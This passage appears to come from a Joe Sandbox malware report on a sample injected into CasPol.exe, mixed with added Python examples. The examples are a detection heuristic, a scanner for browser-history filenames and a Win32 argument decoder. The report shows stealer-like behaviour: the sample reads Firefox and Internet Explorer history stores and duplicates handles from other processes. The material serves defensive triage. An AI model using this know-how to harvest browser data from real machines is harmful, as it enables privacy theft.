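    """Apply the two heuristics and return the rule names that fired, in order."""
    apis = {c.api for c in calls}
    hits = []
    if "LoadLibraryW" in apis and "GetProcAddress" in apis:
        hits.append("dynamic-import-resolution")
    # Any mask that includes PROCESS_DUP_HANDLE counts (PROCESS_ALL_ACCESS too).
    dup_open = any(
        c.api == "OpenProcess" and c.args and ((_hex_arg(c.args[0]) or 0) & PROCESS_DUP_HANDLE)
        for c in calls
    )
    if dup_open and "DuplicateHandle" in apis and ({"MapViewOfFile", "WriteFile"} & apis):
        hits.append("foreign-handle-file-write")
    return hits


# Sample listings copied from the report blocks on this page (constructed input).
LISTING_RESOLVE = """\
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
"""

LISTING_DUP = """\
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
"""

LISTING_RESOURCE = """\
• FindResourceW.KERNEL32(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
"""

if __name__ == "__main__":
    for name, text in (("resolve", LISTING_RESOLVE), ("dup", LISTING_DUP), ("resource", LISTING_RESOURCE)):
        print(name, find_patterns(parse_listing(text)))
```

Run over the three sample blocks, the dynamic-resolution rule fires only on the shell32 block, the handle-duplication rule only on the 0040E01E block, and the plain resource-loading block produces no hit. To use it on a whole report, split the exported text on each "APIs" header and feed each block to `parse_listing`; the `subcall` field lets you attribute a hit to the helper that actually makes the calls.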
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1979745280-0
                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                                                                          • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
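The two function entries above carry the String IDs history.dat$places.sqlite (the GetFileAttributesW routine) and *.*$index.dat (the FindFirstFileW routine). places.sqlite is the Firefox history/bookmarks database, history.dat the legacy Mozilla history file, and index.dat the legacy Internet Explorer cache/history index, so a triage step a practitioner would run on the same memory dump (the .sdmp listed under Memory Dump Source) is a string scan for exactly these names, in both ANSI and UTF-16LE form since the wide-character CRT calls (wcscat, wcscpy) above indicate the paths are built as UTF-16. The scanner below is an added example, not Joe Sandbox code: the dump bytes are constructed inline (filler around the report's strings), the WATCHLIST descriptions are standard knowledge about the browsers' profile layout, and MIN_LEN is an assumed cut-off.

```python
"""Scan a process memory dump for browser-artifact filenames (ANSI and UTF-16LE).

Added example, not part of the Joe Sandbox report: the sample dump is constructed,
the watchlist comes from the String IDs shown in the report above.
"""
import re

# Filenames from the report's String IDs, with the client-side store each one belongs to.
WATCHLIST = {
    "places.sqlite": "Firefox history/bookmarks database",
    "history.dat": "Legacy Mozilla history file",
    "index.dat": "Legacy Internet Explorer cache/history index",
}

# Assumed minimum run length; "*.*" (also in the String IDs) is a FindFirstFileW pattern,
# not a filename, and is deliberately below this cut-off.
MIN_LEN = 6
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(blob):
    """Yield (offset, encoding, text) for every printable run, like `strings` and `strings -e l`."""
    for m in ASCII_RE.finditer(blob):
        yield m.start(), "ascii", m.group().decode("ascii")
    for m in UTF16_RE.finditer(blob):
        yield m.start(), "utf-16le", m.group().decode("utf-16le")


def find_artifacts(blob, watchlist=WATCHLIST):
    """Return (offset, encoding, string, description) for every string containing a watchlisted
    name, case-insensitively, so a full path such as ...\\History\\index.dat still counts."""
    hits = []
    for off, enc, text in extract_strings(blob):
        low = text.lower()
        for name, what in watchlist.items():
            if name in low:
                hits.append((off, enc, text, what))
    return sorted(hits)


def build_sample_dump():
    """Constructed dump (NOT bytes from the real sample): non-printable filler around the
    strings the report lists, in the encodings a stealer routine would leave behind."""
    filler = bytes([0x00, 0x90, 0xCC, 0xFF]) * 12
    parts = [
        filler,
        "*.*".encode("utf-16le") + b"\x00\x00",                         # below MIN_LEN, ignored
        filler,
        "places.sqlite".encode("utf-16le") + b"\x00\x00",               # UTF-16LE filename
        filler,
        b"history.dat\x00",                                             # ANSI filename
        filler,
        "\\Microsoft\\Windows\\History\\index.dat".encode("utf-16le") + b"\x00\x00",  # inside a path
        filler,
        "KERNEL32.dll".encode("utf-16le") + b"\x00\x00",                # benign string, no hit
    ]
    return b"".join(parts)


if __name__ == "__main__":
    for off, enc, text, what in find_artifacts(build_sample_dump()):
        print(f"0x{off:08X} {enc:9s} {text!r:45s} {what}")
```

On a real .sdmp the same find_artifacts() call is run on the file contents; offsets are relative to the dump start, so add the dump's base (00400000 in the Memory Dump Source line) to map a hit back to the address space seen in the report.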
APIs
• SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
• GetLastError.KERNEL32 ref: 004175A2
• GetLastError.KERNEL32 ref: 004175A8
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
• Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
• Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
• GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
• CloseHandle.KERNEL32(00000000), ref: 0040A061
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
• Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
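The API lines in these entries log every argument as a raw 32-bit hex value, and the meaning of a call sits in those values: the CreateFileW entry just above opens with 80000000 (GENERIC_READ), share mode 00000003 (FILE_SHARE_READ|FILE_SHARE_WRITE), disposition 00000003 (OPEN_EXISTING) and flags 02000000 (FILE_FLAG_BACKUP_SEMANTICS), and the subcall further up opens another process with 00000040 (PROCESS_DUP_HANDLE) before CreateFileMappingW with 00000002 (PAGE_READONLY) and MapViewOfFile with 00000004 (FILE_MAP_READ). The decoder below is an added example, not Joe Sandbox code: it parses the line shape visible in this report (Api.Module(args), ref: address; a bare "?" is an argument the hook did not resolve) and maps the constants through the standard Win32 values from the SDK headers. Two caveats are built in: the hook logs a fixed number of stack slots, so OpenProcess shows eleven values although its prototype has three, and only the prototype positions are decoded; and the ref value is treated here as the call-site address in the dumped image, which is an assumption about the report format rather than something the page states.

```python
"""Decode the hexadecimal arguments of Joe Sandbox API-call lines into Win32 symbolic names.

Added example, not Joe Sandbox code. The line format is inferred from the report lines
above; the constants are the standard Win32 values from the Windows SDK headers.
"""
import re

CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"      # CreateFileW.KERNELBASE
    r"(?:\((?P<args>[^)]*)\))?,?\s*"      # (arg,arg,...) absent for e.g. "GetLastError.KERNEL32 ref: ..."
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)"       # ref: 0040A044 (assumed: call-site address in the dump)
)

# "mask" tables are bit flags that may be OR-ed together; "enum" tables are plain values.
GENERIC_ACCESS = ("mask", {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"})
SHARE_MODE = ("mask", {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"})
DISPOSITION = ("enum", {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"})
FILE_FLAGS = ("mask", {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                       0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED",
                       0x80000000: "FILE_FLAG_WRITE_THROUGH"})
PROCESS_ACCESS = ("mask", {0x1: "PROCESS_TERMINATE", 0x8: "PROCESS_VM_OPERATION",
                           0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                           0x40: "PROCESS_DUP_HANDLE", 0x400: "PROCESS_QUERY_INFORMATION"})
PAGE_PROTECT = ("mask", {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"})
FILE_MAP = ("mask", {0x1: "FILE_MAP_COPY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ"})

# Parameter position -> (SDK parameter name, table). Only prototype positions are decoded;
# the hook logs extra stack slots (OpenProcess shows 11 values for a 3-parameter API).
ARG_TABLES = {
    "CreateFileW": {1: ("dwDesiredAccess", GENERIC_ACCESS), 2: ("dwShareMode", SHARE_MODE),
                    4: ("dwCreationDisposition", DISPOSITION), 5: ("dwFlagsAndAttributes", FILE_FLAGS)},
    "OpenProcess": {0: ("dwDesiredAccess", PROCESS_ACCESS)},
    "CreateFileMappingW": {2: ("flProtect", PAGE_PROTECT)},
    "MapViewOfFile": {1: ("dwDesiredAccess", FILE_MAP)},
}


def decode_value(value, kind, table):
    """Map an integer to flag names; unknown bits or values stay as hex so nothing is silently dropped."""
    if kind == "enum":
        return table.get(value, f"0x{value:X}")
    if value == 0:
        return "0"
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if (rest & bit) == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def parse_call(line):
    """Parse one 'Api.Module(args), ref: addr' line; returns None for lines that are not calls."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = []
    if m.group("args") and m.group("args").strip():
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))   # "?" = not resolved by the hook
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def decode_call(line):
    """Parse a call line and attach {parameter name: symbolic value} for the known parameters."""
    call = parse_call(line)
    if call is None:
        return None
    decoded = {}
    for pos, (pname, (kind, table)) in ARG_TABLES.get(call["api"], {}).items():
        if pos < len(call["args"]) and call["args"][pos] is not None:
            decoded[pname] = decode_value(call["args"][pos], kind, table)
    call["decoded"] = decoded
    return call


# Call lines copied from the report entries above.
REPORT_LINES = [
    "CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044",
    "OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093",
    "CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE",
    "MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113",
    "GetLastError.KERNEL32 ref: 004175A2",
]

if __name__ == "__main__":
    for line in REPORT_LINES:
        c = decode_call(line)
        print(f"{c['api']}@{c['ref']:08X}: {c['decoded']}")
```

Reading the decoded CreateFileW this way shows a read-only, non-exclusive open that tolerates the file being held by another process and that works on directories as well as files, which fits the GetFileTime call that follows it; the OpenProcess access right limited to PROCESS_DUP_HANDLE matches the DuplicateHandle that follows in the same subcall.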
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID: }A
• API String ID: 252777609-2138825249
APIs
• malloc.MSVCRT ref: 00409A10
• memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
• free.MSVCRT ref: 00409A31
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: freemallocmemcpy
• String ID:
• API String ID: 3056473165-0
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID:
• String ID: d
• API String ID: 0-2564639436
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memset
• String ID: BINARY
• API String ID: 2221118986-907554435
APIs
Strings
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
• CloseHandle.KERNELBASE(00000000), ref: 0040957A
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: File$??2@CloseCreateHandleReadSize
• String ID:
• API String ID: 1023896661-0
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
• CloseHandle.KERNELBASE(?), ref: 0040CC98
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID:
• API String ID: 2445788494-0
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
APIs
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: memcmpmemset
• String ID:
• API String ID: 1065087418-0
APIs
  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
• GetStdHandle.KERNEL32(000000F5), ref: 00410530
• CloseHandle.KERNELBASE(?), ref: 00410654
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
Memory Dump Source
• Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
Similarity
• API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
• String ID:
                                                                                                                                                                          • API String ID: 1381354015-0
                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2221118986-0
